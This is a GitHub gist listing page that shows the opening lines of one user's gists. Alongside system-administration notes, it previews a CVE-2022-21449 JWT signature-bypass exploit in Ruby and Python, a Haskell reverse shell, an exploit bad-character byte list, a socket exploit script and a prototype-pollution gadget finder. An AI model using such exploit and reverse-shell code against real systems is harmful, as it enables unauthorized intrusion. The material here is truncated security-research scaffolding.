dualfade
dualfade
/ ArchLinux Vagrant; Libvirt wipeout; get your data
Last active
September 25, 2022 01:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Wiped out Vagrant / Libvirt image -- | |
| Save your Effing data -- | |
| Archlinux vagrant AUTO upgrade which toasted /boot/ | |
| initramfs-linux.img* initramfs-linux-fallback.img | |
| THIS DOOZEY DEFAULT ( Vagrantfile Entry ) -> | |
| # config.vm.box_check_update = false | |
| -> Ill definitely be enabling that hah. Do not upgrade until I say so ! |
dualfade
/ cve-2022-21449
Last active
August 7, 2023 14:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # cve-2022-21449 | |
| # dualfade -- | |
| # rewrite in ruby 3 -- | |
| # imports -- | |
| require 'bundler/inline' | |
| require 'ecdsa/signature' | |
| require 'ecdsa/format' |
dualfade
/ cve-2022-21449 jwt ecdsa
Last active
August 7, 2023 15:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # cve-2022-21449.py | |
| # dualfade -- | |
| # refs -- | |
| # https://bit.ly/3aVqwsC -- | |
| # https://bit.ly/3tw6z1P -- | |
| # initial jwt -- | |
| # ex: eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJ0ZXN0QHBlbnRlc3RlcmxhYi5jb20ifQ. \ |
dualfade
/ Ly PKGBUILD
Created
May 28, 2022 15:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Ly PKGBUILD | |
| # See COPYING for license details. | |
| # notes -- | |
| # sudo systemctl disable lightdm.service | |
| # sudo systemctl enable ly.service | |
| # sudo systemctl disable [email protected] | |
| pkgname=ly | |
| pkgver=89.cc5a50f |
dualfade
/ haskell reverse shell --
Last active
May 14, 2022 23:22
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| yain ghc haskell-hls-test-utils | |
| ghc --dynamic r.hs | |
| [0] % ll r | |
| -rwxr-xr-x 1 dualfade dualfade 34K May 5 14:47 r* | |
| [0] % file r | |
| r: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 4.4.0, BuildID[sha1]=53c20a76560c2acee16eb009b709b150bd11440c, not stripped | |
| file -> r.hs | |
| import Network.Socket hiding (send, sendTo, recv, recvFrom) |
dualfade
/ xcalc xcalc.desktop
Last active
April 28, 2022 16:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| I like an old sk00l calculator -- | |
| yes; swiping the default installed galculator icon. So be it -- | |
| /usr/share/applications | |
| -rw-r--r-- 1 root root 197 Apr 28 11:57 xcalc.desktop | |
| [Desktop Entry] | |
| Name=Xcalc | |
| Comment=Perform simple and scientific calculations | |
| Keywords=xcalc |
dualfade
/ py3 quick bad chars --
Created
February 15, 2022 17:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Quick exploit bad char drop -- | |
| # pip install badchars -- | |
| # badchars -f python | sed 's/^\s*\"./\tb"\\/g' | xclipc | |
| badchars = ( | |
| b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" | |
| b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" | |
| b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" | |
| b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" | |
| b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" |
dualfade
/ signatus --
Last active
February 10, 2022 18:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # signatus_03.py -- | |
| # dualfade | |
| import sys | |
| import time | |
| import socket | |
| from struct import pack | |
| from optparse import OptionParser |
dualfade
/ fingerprint.js
Last active
March 25, 2023 18:08
— forked from nikitastupin/fingerprint.js
fingerprint.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // find javascript gadgets -- | |
| // forked => https://gist.github.com/nikitastupin/b3b64a9f8c0eb74ce37626860193eaec | |
| // ref => https://github.com/BlackFan/client-side-prototype-pollution | |
| // ref => https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution | |
| // updated; @dualfade -- | |
| // start -- | |
| // check for known gadgets -- | |
| (() => { | |
| // gadgets -- |
dualfade
/ debug-events.js
Created
December 23, 2021 01:10
— forked from alessioalex/debug-events.js
intercept *.addEventListener for debugging
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // http://stackoverflow.com/questions/4787698/failure-to-override-elements-addeventlistener-in-firefox | |
| (function() { | |
| Error.stackTraceLimit = Infinity; | |
| var _interfaces = Object.getOwnPropertyNames(window).filter(function(i) { | |
| return /^HTML/.test(i); | |
| }).map(function(i) { | |
| return window[i]; | |
| }); |